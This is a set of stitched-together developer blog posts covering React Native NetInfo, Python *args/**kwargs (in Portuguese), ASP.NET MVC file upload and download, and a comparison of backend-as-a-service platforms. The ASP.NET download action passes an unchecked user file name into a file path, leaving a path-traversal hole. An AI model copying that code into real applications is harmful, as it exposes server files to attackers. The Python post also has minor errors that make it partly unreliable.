I have shared a lot about the Netinfo module, but now it's time to create a React Native project and see how to implement all I've shared in a project. I will be using the React Native default boilerplate interface, so you just need to create your project and follow along with all I will share here. To create a React Native project, refer to this [step-by-step guide](https://reactnative.dev/docs/environment-setup#creating-a-new-application). After creating your project, run it on your Android and iOS emulators, and you should have your emulators showing:

### Installing Netinfo Module
The Netinfo module can be installed from npm by running the command in your terminal from your project's root folder.
```javascript
npm i @react-native-community/netinfo
//To Install iOS dependencies
cd ios && pod install
```
After installing the module and iOS dependencies, run your project in your Android and iOS emulators.
### Detecting & Handling Different Network States
There are different network states, and these can be categorized into Online states, offline states, and unknown states. The Online state indicates that the device is connected to the internet and has a stable network connection. The Offline state indicates that the device is not connected to the internet or has a poor-quality network connection. The Unknown state means that the NetInfo module cannot determine the network state, which could be due to an error or an unsupported platform.
Each of these network states can impact an app's functionality, so it is important to be able to detect and respond to changes in network state as they occur. The NetInfo module provides access to this information so that we can build apps that respond to changes in network state and provide a seamless user experience even in the presence of network connectivity issues.
### Detecting Network States
To detect network states, I will import the Netinfo module into the project and use the `useNetInfo` hook or the `NetInfo.addEventListener` method to access the network information. The `useNetInfo` hook returns an object that contains the network information, including the type of network, the quality of the connection, and whether the device is connected to the internet. The `NetInfo.addEventListener` method, on the other hand, allows us to add a listener that listens for changes in the network state, and this method takes a callback function as an argument and invokes the function whenever the network state changes.
I will import the Netinfo module into the project to implement this in our project. With the [React useEffect hook](https://reactjs.org/docs/hooks-effect.html), I add an event listener for network state changes using the `NetInfo.addEventListener` function, and it returns an unsubscribe function to stop listening to the changes when the component unmounts. The callback function logs the data to the console on network change. The code is below:
```javascript
//Add this at the top of the page
import NetInfo from "@react-native-community/netinfo";
//Add this within the App component
React.useEffect(() => {
const unsubscribe = NetInfo.addEventListener((state) => {
console.log(state);
});
return () => {
unsubscribe();
};
}, []);
```
Reload your app or turn your network connection on and off, and you should have your console show up like this:

From the data on the console, you can see that you can retrieve the connection type, the connection status, the IP address, etc. when it's online, but when it's offline, it only returns the connection status or false. In the next section, I will create a component that will be displayed when the device is not connected to the internet by listening to network changes and responding accordingly.
### Creating a Network Status component
Now I will create a simple component that will be displayed once the network state indicates that the device isn't connected to the internet. Insert the code below before the app component.
```javascript
const NetworkCheck = ({ status, type }) => {
return (
<View style={styles.container}>
<Text style={styles.statusText}>
Connection Status : {status ? "Connected": "Disconnected"}
</Text>
<Text style={styles.statusText}>Connection Type : {type}</Text>
</View>
);
};
```
Also, add the styles below in the stylesheet component:
```javascript
container: {
flex: 1,
padding: 20,
alignItems: 'center',
justifyContent: 'center',
backgroundColor: '#ff0000',
},
statusText: {
fontSize: 18,
textAlign: 'center',
margin: 10,
color: '#ffffff',
},
```
Next, using the [React useState hook](https://reactjs.org/docs/hooks-state.html), I will create two states that will hold the connection status and connection type so that it is displayed on the screen. When the internet connection isn't available, it'll also show that it's not available. After this, I will create a function to set the state of the connection status and type.
```javascript
const [connectionStatus, setConnectionStatus] = React.useState(false);
const [connectionType, setConnectionType] = React.useState(null);
const handleNetworkChange = (state) => {
setConnectionStatus(state.isConnected);
setConnectionType(state.type);
};
```
Moving on, we will update the [useEffect hook](https://reactjs.org/docs/hooks-effect.html). Now NetInfo.addEventListener method will take only one argument: the handleNetworkChange function. This callback function will be fired whenever there's a network change. The code is below:
```javascript
useEffect(() => {
const netInfoSubscription = NetInfo.addEventListener(handleNetworkChange);
return () => {
netInfoSubscription && netInfoSubscription();
};
}, []);
```
Finally, for this section, I will update the app component and use a conditional statement to mount the NetworkCheck component we created earlier when there's no internet connection. When it detects an internet connection, it should unmount the NetworkCheck component and mount the app screen. I removed some boilerplate codes. The code is below:
```javascript
return (
<>
{connectionStatus ? (
<SafeAreaView style={backgroundStyle}>
<StatusBar barStyle={isDarkMode ? "light-content" : "dark-content"} />
<ScrollView
contentInsetAdjustmentBehavior= "automatic"
style={backgroundStyle}
>
<Header />
<View
style={{
backgroundColor: isDarkMode ? Colors.black : Colors.white,
}}
>
<Section
title={
"Connection Status : "+ connectionStatus
? "Connected"
: "Disconnected"
}
></Section>
<Section title={"You are connected by " + connectionType}></Section>
</View>
</ScrollView>
</SafeAreaView>
) : (
<NetworkCheck status={connectionStatus} type={connectionType} />
)}
</>
);
```
If you implemented this correctly as shown, you should have your Android and iOS emulators showing up like so:

## Conclusion
The NetInfo module in React Native provides a simple and powerful tool for detecting the network state of a device. With its ability to detect network state changes in real-time, cross-platform compatibility, and easy integration into React Native apps, it's an essential tool for any React Native developer. Whether you're building a simple app or a complex one, the NetInfo module can help you ensure that your app remains functional and responsive, even in the face of network connectivity changes. With this tutorial, I am sure you will be able to implement it in your project. For the complete source code of this tutorial, refer to my [GitHub repo](https://github.com/championuz/RNNetworkCheck), and if you have any challenges, do well to reach out, as I will be glad to help.
[](https://newsletter.openreplay.com/)
| asayerio_techblog |
1,411,768 | Desempacotamento - *args e **kwargs | Vamos entender sobre o desempacotamento, ou seja, uma forma que podemos atribuir diversos valores ao... | 0 | 2023-03-23T01:47:43 | https://dev.to/scjorge/desempacotamento-args-e-kwargs-clp | python, tutorial, programming, braziliandevs | Vamos entender sobre o desempacotamento, ou seja, uma forma que podemos atribuir diversos valores ao mesmo tempo.
vamos primeiro entender uma habilidade que o Python nos traz. Podemos ter múltiplas atribuições de valores ao declarar variáveis e, também, podemos retornar mais de um valor em nossas funções. Vejamos:
```python
a, b, c = 1, 2, 3
print(a, b, c, sep=" - ")
```
saída:
```
1 - 2 - 3
```
<br>
Maravilha! atribuímos 3 valores em 3 diferentes variáveis em uma só linha. E isso é a base pro no Post de hoje.
Agora vamos brincar um pouco com listas. Vejamos:
```python
a, b, c = [1, 2, 3]
print(a, b, c, sep=" - ")
```
saída:
```
1 - 2 - 3
```
<br>
Conseguimos exatamente o mesmo resultado. Ou seja, é possível utilizar os valores de uma lista para atribuições múltiplas. E como mencionamos, funções podem fazer as mesmas coisas, olha só:
```python
def retorno_multiplo():
return 1, 2, 3
a, b, c = retorno_multiplo()
print(a, b, c, sep=" - ")
```
saída:
```
1 - 2 - 3
```
<br>
Ótimo, agora que entendemos legal essas atribuições múltiplas, vamos ao que nos interessa.
basicamente o desempacotamento é a idea de podemos realizar essas atribuições que fizemos de forma dinâmica.
Eu sei, parece estranho, então vamos de exemplo:
```python
lista = [1, 2, 3]
a, *nova_lista = lista
print(a, nova_lista)
```
saída:
```
1 [2, 3]
```
<br>
Interessante ne? Atribuímos o primeiro item da lista a variável "a" e o restante automaticamente em uma nova lista chamada "nova_lista". Pronto, esse é o tal do desempacotamento. É para isso que usamos o caractere estrela "*".
Vamos brincar um pouco com funções, afinal de contas é aqui que realmente utilizamos esse conceito no dia a dia.
Que venha código então 😊
```python
def recebe_nomes(*args):
print(args)
recebe_nomes("akuma", "ryu", "ken")
```
saída:
```
('akuma', 'ryu', 'ken')
```
<br>
Olha só a mágica acontecendo. Acabamos de criar uma função que aceita vários argumentos dinamicamente. E nosso argumento "args" se tornou uma tupla com todos os argumentos que passamos da mesma forma como vimos anteriormente.
<br>
## Lidando com argumentos/parâmetros em funções
Agora vamos fazer uma pequena pausa e entender como as funções lidam com argumentos no Python. Juro que essa pausa é importante 😜
Bem, o Python utiliza de dois tipos de argumentos
- argumentos ordenados
- argumentos nomeados
### Entendendo argumentos ordenados
Os ordenados são os que acabamos de fazer. Eles são reconhecidos primeiro nas funções. Ou seja, uma vez que você utilizar um argumento nomeados, os ordenados não terão mais efeitos, mas eu explico melhor já já.
Os ordenados são quando passamos os valores diretamente para as funções, vejamos:
```python
def recebe_tres_nomes(nome_1, nome_2, nome_3):
print(nome_1, nome_2, nome_3)
recebe_tres_nomes("akuma", "ryu", "ken")
```
saída:
```
akuma ryu ken
```
<br>
Veja que interessante, utilizei o mesmo exemplo que já vimos, e, também, criei a função de forma explicita para receber 3 nomes. Mas no geral a ideia é mostrar os argumentos sendo passados um a um, e vamos nos atentar que estamos passando os valores diretamente quando estamos chamando a função. Então o *args é essa lista de parâmetros que passamos de forma ordenada.
Observe que a função "recebe_tres_nomes" não mostra uma tupla mas sim cada item isolado, isso porque definimos que seria mostrado cada item
### Entendendo argumentos nomeados
Vamos lá, agora vamos utilizar o mesmo exemplo, porém vamos passar parâmetros nomeados. Observe vou mudar a ordem dos nomes, e com isso vamos ter mesmo resultado
```python
def recebe_tres_nomes(nome_1, nome_2, nome_3):
print(nome_1, nome_2, nome_3)
recebe_tres_nomes(nome_2="ryu", nome_3="ken", nome_1="akuma")
```
saída:
```
akuma ryu ken
```
<br>
Agora utilizei argumentos na ordem invertida e tivemos o mesmo resultado. Isso porque o Python consegue ler o nome de cada parâmetro e capturar o seu valor.
Mas tem um detalhe aqui. Lembra que comentei que devemos respeitar a ordem de reconhecimento dos argumentos nas funções? Bem, eu disse que devemos sempre utilizar os paramentos ordenados e depois os nomeados.
Então é possível chamar nossa função assim:
```python
def recebe_tres_nomes(nome_1, nome_2, nome_3):
print(nome_1, nome_2, nome_3)
recebe_tres_nomes("akuma", nome_2="ryu", nome_3="ken")
```
saída:
```
akuma ryu ken
```
<br>
Viu só, eu passei o primeiro ordenado e o restante através dos nomes dos argumentos. Agora não podemos inverter isso. Olha pra mim aqui 🥸 Não funciona! Veja você mesmo.
```python
def recebe_tres_nomes(nome_1, nome_2, nome_3):
print(nome_1, nome_2, nome_3)
recebe_tres_nomes(nome_2="ryu", nome_3="ken", "akuma")
```
saída:
```
recebe_tres_nomes(nome_2="ryu", nome_3="ken", "akuma")
^
SyntaxError: positional argument follows keyword argumentakuma ryu ken
```
<br>
O Python vai reclamar da ordem dos tipos de argumentos.
Não tente isso em casa... Brincadeira, tente e veja você mesmo.
## Retornando ao desempacotamento
Bem, como eu havia dito, isso foi uma pequena pausa pra que possamos entender o desempacotamento nomeado
sabemos como funciona um dicionário em Python certo? (espero que sim 🤣)
temos chave seguido de valor
então se tentarmos atribuir um dicionário a várias variáveis, essas variáveis irão receber as chaves. Olha só
```python
nomes = {
'nome_1': 'akuma',
'nome_2': 'ryu',
'nome_3': 'ken'
}
a, b, c = nomes
print(a, b, c)
```
saída:
```
nome_1 nome_2 nome_3
```
<br>
Agora é aqui que está o 'pulo do gato', se passamos como argumento nossa lista de nomes com 2 estrelas, iremos receber a chave e os valores na função, cada chave ira servir como um argumento nomeado para a função. Legal né?
```python
def recebe_nomes(nome_1, nome_2, nome_3):
print(nome_1, nome_2, nome_3)
nomes = {
'nome_1': 'akuma',
'nome_2': 'ryu',
'nome_3': 'ken',
}
recebe_nomes(**nomes)
```
saída:
```
akuma ryu ken
```
<br>
Lembre-se que se caso você passar um argumento que não existe, uma exceção será levantada, porque não existe nos argumentos que foram definidos:
```python
def recebe_nomes(nome_1, nome_2, nome_3):
print(nome_1, nome_2, nome_3)
nomes = {
'nome_1': 'akuma',
'nome_2': 'ryu',
'nome_3': 'ken',
'nome_4': 'mega man',
}
recebe_nomes(**nomes)
```
saída:
```
Traceback (most recent call last):
File "c:\DevNew\Myblog\MyBlog\posts\post_03\code.py", line 14, in <module>
recebe_tres_nomes(**nomes)
TypeError: recebe_tres_nomes() got an unexpected keyword argument 'nome_4'
```
<br>
Bom, é por isso que utilizamos o **kwargs, porque aí iremos receber quantos argumentos forem precisos:
```python
def recebe_nomes(**kwargs):
print(kwargs)
nomes = {
'nome_1': 'akuma',
'nome_2': 'ryu',
'nome_3': 'ken',
'nome_4': 'mega man'
}
recebe_nomes(**nomes)
```
saída:
```
{'nome_1': 'akuma', 'nome_2': 'ryu', 'nome_3': 'ken', 'nome_4': 'mega man'}
```
<br>
E agora o argumento "kwargs" se tornou um dicionário com todos os nossos argumentos nomeados.
Bem, vamos pensar na ordem dos tipos de argumentos. Obrigatoriamente tem que ser os ordenados, e em seguida os nomeados. E como já brincamos com os dois. Que tal misturar as coisas e fazer com que a função aceite tanto um quanto o outro?
```python
def recebe_nomes(*args, **kwargs):
print(args)
print(kwargs)
recebe_nomes("akuma", "ryu", "ken", jogo="street fighter")
```
saída:
```
('akuma', 'ryu', 'ken')
{'jogo': 'street fighter'}
```
<br>
Viu só, passamos vários argumentos ordenamos, que ficou na tupla "args", e os nomeados ficou no dicionário "kwargs"
Podemos desempacotar através de listas e dicionários também:
```python
def recebe_nomes(*args, **kwargs):
print(args)
print(kwargs)
nomes = {
'nome_1': 'akuma',
'nome_2': 'ryu',
'nome_3': 'ken',
'nome_4': 'mega man'
}
jogos = ["street fighter", "Mega Man x4"]
recebe_tres_nomes(*jogos, **nomes)
```
saída:
```
('street fighter', 'Mega Man x4')
{'nome_1': 'akuma', 'nome_2': 'ryu', 'nome_3': 'ken', 'nome_4': 'mega man'}
```
<br>
Bom isso foi o desempacotamento e as expressões *args e **kwargs que vemos por aí.
## Considerações
Quero te lembrar que esses nomes são uma convenção, funcionária com qualquer nome. Você não é obrigado a usar as palavras args e kwargs para funcionar. Se o planeta escreve assim, vamos escrever também, certo? Vamos manter o padrão.
Por curiosidade, o nome "args" vem de "arguments" (argumentos), e "kwargs" vem de "known arguments" (argumentos conhecidos)
E é isso! Obrigado por chegar até aqui 😉
## Conclusão
Usar a técnica de desempacotamento em função é muito comum no dia a dia. É um assunto que gera um pouco de confusão quando olhamos a primeira vez, por isso tentei detalhar o máximo possível para que possam realmente entender como funciona. Espero poder ter ajudado alguém.
| scjorge |
1,411,902 | How to Upload and return files in ASP.NET MVC? | In this blog, we will shed light on how to upload and return a file in ASP.NET MVC. When a user... | 0 | 2023-03-23T05:15:27 | https://www.ifourtechnolab.com/blog/how-to-upload-and-return-files-in-asp-net-mvc | beginners, mvc, dotnet, webdev | In this blog, we will shed light on how to upload and return a file in ASP.NET MVC.
When a user uploads files, they should be uploaded to their project folder. We need to create a folder for the uploaded file in our project. Let’s get started with creating an MVC application.
## Creating MVC Application
Create a new MVC application for file uploading and downloading.
### Adding Folder
Here, we created a folder in our project to store uploaded files.

[Fig :- Storing Uploaded File]
We need to create a model class for file upload and return files. Right-click on Model Folder and add a class file. Here I will use the code-first approach to implement File upload and return functionality. Place the following code inside the class file.
**Filetables.cs**
```
using System.Collections.Generic;
using System.Web;
namespace Dynamicappendpartial.Models
{
public class Filetables
{
public IEnumerable<httppostedfilebase> files { get; set; }
public int Id { get; set; }
public string File { get; set; }
public string Type { get; set; }
}
}
</httppostedfilebase>
```
Right-click on Models and add Ado.Net Entity Data model.

[Fig :- Empty Code First model]
This Empty code First model creates a context file for your database connection. You can now add your Filetables class within the context file shown below.
```
using System;
using System.Data.Entity;
using System. Linq;
namespace Dynamicappendpartial.Models
{
public class FileBlog: DbContext
{
public FileBlog(): base("name=FileBlog")
{
}
public virtual DbSet<filetables> Filetables { get; set; }
}
}
</filetables>
```
Now, we need to execute all the required Migrations commands within the package manager control.
### Read More: [Generate Thumbnail Using Asp.net MVC](https://www.ifourtechnolab.com/blog/generate-thumbnail-using-asp-net-mvc)
We need to add a controller. Right-click on the Controller folder and click on add > controller.

[Fig :- Creating Controller]
Select empty controller form list and give the suitable name of the controller. Here I give controller name as Filetables. And place the following code inside the controller.

[Fig :- Add Controller]
**FiletableController**
```
using System;
using System.Collections.Generic;
using System.Data;
using System.Data.Entity;
using System.IO;
using System.Linq;
using System.Net;
using System.Web;
using System.Web.Mvc;
using Dynamicappendpartial.Models;
namespace Dynamicappendpartial.Controllers
{
public class FiletablesController : Controller
{
private FileBlog db = new FileBlog();
// GET: Filetables
public ActionResult Index()
{
List<filetables> ObjFiles = new List<filetables>();
foreach (string strfile inDirectory.GetFiles(Server.MapPath("~/UploadFile")))
{
FileInfo fi = new FileInfo(strfile);
Filetables obj = new Filetables();
obj.File = fi.Name;
obj.Type = GetFileTypeByExtension(fi.Extension);
ObjFiles.Add(obj);
}
return View(ObjFiles);
}
public FileResult Download(string fileName)
{
string fullPath = Path.Combine(Server.MapPath("~/UploadFile"), fileName);
byte[] fileBytes = System.IO.File.ReadAllBytes(fullPath);
return File(fullPath, "application/force-download", Path.GetFileName(fullPath));
}
private string GetFileTypeByExtension(string extension)
{
switch (extension.ToLower())
{
case ".docx":
case ".doc":
return "Microsoft Word Document";
case ".xlsx":
case ".xls":
return "Microsoft Excel Document";
case ".txt":
return "Text Document";
case ".jpg":
case ".png":
return "Image";
default:
return "Unknown";
}
}
[HttpPost]
public ActionResult Index(Filetables doc)
{
try
{
foreach (var file in doc.files)
{
if (file.ContentLength > 0)
{
var fileName = Path.GetFileName(file.FileName);
var filePath = Path.Combine(Server.MapPath("~/UploadFile"), fileName);
file.SaveAs(filePath);
}
}
TempData["Message"] = "files uploaded successfully";
return RedirectToAction("Index");
}
catch
{
TempData["Message"] = "File upload Failed!!";
return RedirectToAction("Index");
}
}
}
}
</filetables>
</filetables>
```
Here I am creating two index methods one for uploading content to the database and one for uploading the file. The first index method is used to retrieve the uploaded file list and display it on the index page. On the same index page, I will create a form to upload files in the database.
The Last Index method in the controller is for uploading a file on a server. I want to store all files inside the upload file folder we created before starting the code. And use the TempData to display the message after files are uploaded successfully. If any exception occurs during execution or if the file was not uploaded successfully TempData shows File Uploaded Failed message on view.
In the controller, I am creating one method for file Extension. This method is used to display which type of file we uploaded to the database. And also create a method for downloading an uploaded file.
Right-click on the index method and add a view for the index method.
**IndexView**
```
@model IEnumerable<dynamicappendpartial.models.filetables>
@{
ViewBag.Title = "Index";
}<style type="text/css">
.btn {
width: 100px;
background: #00BCD4;
border: 1px solid;
border-color: white;
color: white;
}
.card {
width: 100%;
}
.gridborder {
margin: 20px;
border-top: 2px solid #DED8D8;
}
</style><div style="border: 1px solid #DED8D8; width: 900px; font-family: Arial;">
@using (@Html.BeginForm(null, null, FormMethod.Post,
new { enctype = "multipart/form-data" }))
{
if (TempData["Message"] != null)
{<p style="font-family: Arial; font-size: 16px; font-weight: 200; color: red">@TempData["Message"]</p>
}
<div class="card mb-3"><div class="card-body"><h2 style="color: #47bfed">FILE UPLOAD AND DOWNLOAD IN ASP NET</h2>
<p class="card-text"><b style="color: #FF5722">File:</b></p>
<p class="card-text"> <input id="files" multiple="multiple" name="files" type="file"></p>
<input class="btn btn-primary" name="submit" type="submit"></div></div>
}
@foreach (var item in Model)
{
}
<table class="gridborder row-borderhover order-column dataTable no-footer"><tbody><tr><td> </td></tr></tbody><tbody><tr><td> </td><th class="sorting_asc">
@Html.DisplayNameFor(model => model.File)</th><td> </td><th class="sorting">
@Html.DisplayNameFor(model => model.Type)</th><td> </td><th class="sorting"> </th><td> </td></tr><tr><td> </td><td class="sorting_1">
@Html.DisplayFor(modelItem => item.File)</td><td> </td><td class="sorting_1">
@Html.DisplayFor(modelItem => item.Type)</td><td> </td><th class="sorting">
@Html.ActionLink("Download", "Download", new { fileName = item.File })</th><td> </td></tr></tbody></table></div>
</dynamicappendpartial.models.filetables>
```
Here in view I am creating an upload file and retrieve a list of the uploaded file in the same view you can modify the code as per your requirements.
For the Uploading file, we have to require an input type file so we can select the file.
### Searching for Reliable [ASP.NET Development Company](https://www.ifourtechnolab.com/dot-net-development-company)?
Now run the application. On index view, you can show the choose file option.

[Fig :- Index view for File Uploading]
If the file was upload successfully you can show the file upload successfully message in view.

[Fig :- Uploaded file Display with the message]
If the file was not uploaded or we can click submit button without selecting the file it will display the File upload failed message in view.

[Fig :- Uploaded file with the failed message]

[Fig :- Uploaded file]
You can see all the uploaded files inside the folder we have created.
Click on the Download link to download the file. Here I download all files you can show the downloaded file in the browser.

[Fig :- Download File]
## Conclusion
Here in this blog, I try to explain how to upload files in a database and how to retrieve the list of the file uploaded in a database, and how to download the uploaded file from the database with a successful and error message.
| ifourtechnolab |
1,411,931 | Top Backend-as-a-Service Solutions (BaaS) in 2023 | What is BaaS? Backend-as-a-service (a.k.a BaaS) is a model that provides developers with... | 0 | 2023-03-23T06:23:16 | https://blog.samiyousef.ca/comparing-backend-as-a-service-solutions-a-complete-guide/?ref=dev.to | baas, firebase, awsamplify, supabase | ---
title: Top Backend-as-a-Service Solutions (BaaS) in 2023
published: true
date: 2023-02-06 01:18:55 UTC
tags: BaaS,Firebase,AWSAmplify,Supabase
canonical_url: https://blog.samiyousef.ca/comparing-backend-as-a-service-solutions-a-complete-guide/?ref=dev.to
---

## What is BaaS?
Backend-as-a-service (a.k.a BaaS) is a model that provides developers with things such as user authentication and edge functions without needing to host a backend. The backend for the application is hosted by a third-party company (or sometimes self-hosted) and is "rented" to the client, hence the name.
It has exploded in popularity recently because of its ease of use and cost-effectiveness for small applications. With that said, not all BaaS solutions are created equally. Let's compare some alternatives while keeping the following things in mind:
- Features
- Pricing
- Scalability
- Security
- Platform support and extensibility
## Comparison
### Firebase
**Features:** Firebase's products are split into "Build", "Release & Monitor", and "Engage". Their build products include Firestore, Realtime Database, Cloud Functions, Authentication, and much more. The newly added Firebase ML allows you to add artificial intelligence to your project with minimal oversight.
**Pricing:** Firebase offers a generous free tier giving you 1 GB of Realtime Database, 1 GB of Firestore, 10K phone verifications, 5 GB of Cloud Storage, 200K CPU-seconds for Cloud Functions, 10 GB of static hosting, and 1000 ML API calls. Pricing above the free tier is competitive, being only slightly cheaper than AWS Amplify. [See more here.](https://firebase.google.com/pricing?ref=sami-yousefs-blog)
**Scalability:** Given Firebase is operated by Google, you almost do not need to worry about scaling. However, one caveat is the Realtime Database, which is limited to 1000 writes per second. Additionally, as your application grows, its cost will grow faster. At a large scale, Firebase is less cost-effective than other solutions.
**Security:** Being a proprietary platform, it's hard to assess the security of Firebase's internals. However, Firebase's SDKs are open-source and have no known security issues as of this time. The majority of Firebase is ISO and SOC-compliant, but some Firebase products have not completed ISO 27017 and ISO 27018 certifications, which might be a deal-breaker for large organizations.
In 2018, Appthority Inc. found over 3000 insecure Firebase databases leaking millions of records, some including 2.7 million plain-text passwords. Most agree that the fault lies with the developers for misconfiguring the databases and neglecting to encrypt passwords, but some argue Firebase should have better documentation or encryption by default.
**Platform Support and Extensibility:** Firebase has client SDKs for iOS, Android, Flutter, Web, C++, and Unity. Firebase also offers admin SDKs to integrate with your backend for Node.js, Java, Python, Go, and C#. If none of these meet your needs, Firebase also has a well-documented REST API, making it compatible with almost any application.
Firebase features a wide variety of extensions making integrations easier. Firebase extensions are currently in beta, so they're not quite ready for production. However, this is an excellent feature as it lets you do things like resizing an image or running payments with Stripe with minimal coding.
**Best for:** Medium-sized applications or start-ups, or developers just starting with BaaS.
### AWS Amplify
**Features:** AWS Amplify offers a comprehensive set of tools for building cloud-powered mobile and web applications. Its offerings include APIs, backend services, authentication, and storage. Amplify also integrates with other AWS services such as AppSync, Lambda, and Amazon S3 for even more functionality.
**Pricing:** AWS Amplify operates on a pay-as-you-go pricing model, meaning there are no upfront costs or ongoing commitments. The pricing is competitive and only slightly more expensive than Firebase. Pricing may vary depending on the services utilized, but AWS provides example usage scenarios to assist in cost estimation. [See more here](https://aws.amazon.com/amplify/pricing/?ref=sami-yousefs-blog).
**Scalability:** Since Amplify is built on the highly scalable AWS infrastructure it's ideal for applications that need to handle large traffic and growth. You almost never have to worry about your application crashing or slowing down during peak usage times.
**Security:** Like Firebase, Amplify is proprietary, meaning it's hard to assess its security. However, Amplify is part of multiple AWS compliance programs. It is frequently audited by third parties such as SOC, PCI, ISO, HIPAA, MTCS, C5, K-ISMS, ENS High, OSPAR, HITRUST CSF, and FINMA. Amplify's compliance makes it ideal for large, international companies that are required by law to use solutions that meet certain standards.
**Platform Support and Extensibility:** Amplify has SDK support for Javascript, Swift, Android, Flutter, and React Native. Amplify also has well-documented REST and GraphQL APIs making it easy to integrate with almost any platform.
AWS Amplify also offers a lot of options for customizing your backend. You can override generated resources, access and import existing AWS resources, and run custom scripts during deployment with the help of command hooks. And if you have specific DevOps tools and guidelines, the export feature lets you easily integrate Amplify into your existing setup. However, this needs to be set up manually, and it's much harder than Firebase's extensions feature.
**Best for:** Large-scale, complex applications and/or enterprise-level businesses.
### Supabase
**Features:** Supabase is an open-source Firebase alternative. It offers a Postgres database, Authentication, instant APIs, Edge Functions, Realtime subscriptions, and Storage.
**Pricing:** Supabase offers free, monthly, and pay-as-you-go pricing models. The pricing is reasonable and cost-effective compared to both Firebase and AWS Amplify. For $25/month, you get an 8GB database, 100GB file storage, 2M Edge Function invocations, daily backups and more. And since Supabase is open-source, you can host it yourself, although this is at the cost of scalability.
**Scalability:** Supabase is centred around one Postgres database, which makes it very scalable vertically. However, it's difficult to scale Supabase horizontally without sharding or replication, which come with their own pitfalls. [According to Inian Parameshwaran](https://github.com/supabase/supabase/discussions/323?ref=sami-yousefs-blog#discussioncomment-1044570), an engineer at Supabase, "We don't have a good solution yet for scaling Postgres horizontally, even in the hosted version, but we are working on that."
**Security:** Supabase is open-source, which means its security is transparent and easy to assess. It's SOC2 Type 1 compliant and sensitive information is encrypted at the application level before being stored. Additionally, Supabase's security monitoring is automated by Vanta, and Trust Reports are published regularly.
**Platform Support and Extensibility:** Supabase officially supports only Javascript and Flutter, but the community has built SDKs for Python and C++, too. Supabase has instant APIs, meaning API endpoints are automatically generated based on your schema. This would allow you to use Supbase on unsupported platforms, but the API documentation is not as robust as Firebase or AWS Amplify.
Like Firebase's extensions, Supabase offers integrations with third parties. Unlike Firebase, integrations with Supabase are a bit harder to set up, but the process is well-documented. Additionally, the open-source nature of Supabase means that you can add custom features and extensions to your backend as you see fit.
**Best for:** Small to medium-sized applications, projects that need a cost-effective solution, and developers who are looking for an open-source platform.
### Appwrite
**Features:** Appwrite is an open-source, self-hosted backend-as-a-service platform that offers Databases, Authentication, Storage, and Functions. Appwrite Cloud, the hosted version is currently in development but will be coming soon.
**Pricing:** The cost of hosting Appwrite varies depending on the hosting solution you use. Pricing for Appwrite Cloud is not available as of this date.
**Scalability:** Appwrite is built with scalability in mind, but it must be scaled manually. It uses a few Docker containers to run, and each container has its own job. Since most of these containers are stateless, scaling Appwrite is as simple as replicating them and putting them behind a load balancer.
**Security:** Like Supabase, Appwrite is open-source meaning security is easy to assess and vulnerabilities are caught and fixed quickly. As of writing, there are no known vulnerabilities in Appwrite. Additionally, Appwrite implements most modern security features like rate limiting and encryption.
**Platform Support and Extensibility:** The Appwrite server runs on Docker, making it supported on almost every platform. Appwrite also has client SDKs for the Web, Android, iOS, and Fluter, and admin SDKs for Node.js, Deno, PHP, Python, Ruby, Dart, Kotlin, and Swift. If none of these options fit your needs, Appwrite also features REST, GraphQL, and Realtime APIs allowing you to integrate on almost any platform.
Appwrite does not feature pre-built extensions or integrations. However, you can add custom features or make your own integrations because Appwrite is open-source.
**Best for:** Small- to medium-sized applications, and developers who want to host their own platform.
### Parse Platform
**Features:** Similar to Appwrite, Parse Platform is an open-source, self-hosted BaaS. Parse offers a comprehensive set of features like Authentication, Role-based access control, File Storage, Notifications, Cloud Functions, Analytics, and much more.
**Pricing:** Parse Platform is entirely self-hosted, pricing will vary depending on your hosting solution.
**Scalability:** Like Appwrite, the Parse server is stateless, meaning scaling it is as easy as replicating it and putting it behind a load balancer. Parse supports MongoDB and Postgres, which need to be scaled separately. According to [back4app](https://blog.back4app.com/how-to-scale-parse-server/?ref=sami-yousefs-blog), Parse can be scaled to handle well over 1000 requests per second.
**Security:** Parse uses Snyk to find vulnerabilities in its code base. As of writing, Parse has one high-severity denial of service vulnerability and 6 various medium-severity vulnerabilities. Besides these vulnerabilities, Parse is relatively secure because of its open-source nature.
**Platform Support and Extensibility:** Parse has excellent platform support with SDKs for Objective-C, Android, Javascript, Swift, Flutter, Dart, PHP, .NET, Unity, and even Arduino and Embedded C. And if these SDKs somehow don't fit your needs, Parse has REST and GraphQL APIs to easily integrate with any platform.
Parse does not have official extensions or integrations, but there are lots of community-built extensions, adapters and boilerplate starter code. Additionally, like any other open-source platform, you can add or modify Parse in any way you'd like to fit your needs.
**Best for:** Developers who want a comprehensive set of features while still hosting their own solution.
### PocketBase
**Features:** PocketBase is an open-source BaaS that features Authentication, File storage, and a real-time database. The kicker is the entire database is a single SQLite file, hence the name.
**Pricing:** PocketBase is entirely self-hosted and the price will depend on your hosting solution.
**Scalability:** Because PocketBase utilizes a single file as its database, it cannot scale horizontally. Additionally, scaling it vertically will be limited by the read and write speeds of your disk.
**Security:** PocketBase has excellent security because of its open-source nature and any vulnerabilities are quickly discovered and fixed. As of writing, PocketBase has no known security vulnerabilities.
**Platform Support and Extensibility:** PocketBase can be used as a standalone app or as a Go framework. When used as a standalone app, it only has official SDKs for Javascript and Dart. PocketBase does have a Web API so it can integrate with any platform.
**Best for:** Small-scale applications and prototyping.
## More Useful Information
### Choosing the Right BaaS Solution for Your Project
When it comes to selecting the perfect BaaS solution for your project, it's vital to consider the success and growth potential of your application. If you're looking for an open-source solution, Appwrite, Supabase, and Parse Platform are all great options to consider. On the other hand, if compliance with specific regulations is a must, AWS Amplify may be the ideal solution for you. And if you're new to BaaS and value strong community support, then Firebase is the way to go. To make an informed decision, take the time to carefully evaluate each solution, comparing features, pricing, and security measures to determine which one best fits your project's unique needs.
### Best Practices for Implementing a BaaS Solution
When using a BaaS, it's important to follow best practices to ensure a seamless and successful implementation. To ensure sensitive data is protected, you should use a strong encryption algorithm such as AES and always use HTTPS when making requests to the backend. Additionally, you should use environment variables and repository secrets to store API keys and never hard-code them. Finally, make sure to thoroughly check API response codes and handle them appropriately to avoid any unexpected errors in production.
## Conclusion and Final Thoughts
Backend-as-a-service (BaaS) is a cost-effective solution for developers who want to host their application's backend without having to worry about the nuances of implementing their own. The choice of BaaS solution will depend on the size, complexity, and specific requirements of your application. Each BaaS has its own strengths and limitations and the best solution will ultimately depend on your specific use case. | sami_yousef |
